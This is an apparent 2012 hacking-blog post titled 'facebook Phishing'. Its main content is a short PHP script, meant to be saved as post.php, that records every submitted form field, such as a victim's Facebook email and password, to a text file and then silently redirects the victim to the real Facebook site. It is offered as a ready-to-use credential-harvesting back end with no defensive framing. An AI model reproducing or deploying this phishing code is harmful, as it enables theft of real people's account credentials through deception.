A discussion about: Introduction to hacking... Basic concepts.... Latest tools and technologies.. Exploits... and much much more... This is a moderated blog...Any kind of advertisement will not be tolerated... Plz only post about hacking and other computer technology...
Thursday, 19 January 2012
Wednesday, 18 January 2012
facebook Phishing
Facebook phishing
For information go to http://www.hacrao.blogspot.com
https://www.facebook.com/groups/iamahacker/?notif_t=group_activity
<?php
header("Location: http://www.facebook.com/");
$handle = fopen("raosrulez.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it as "post.php"
Subscribe to:
Posts (Atom)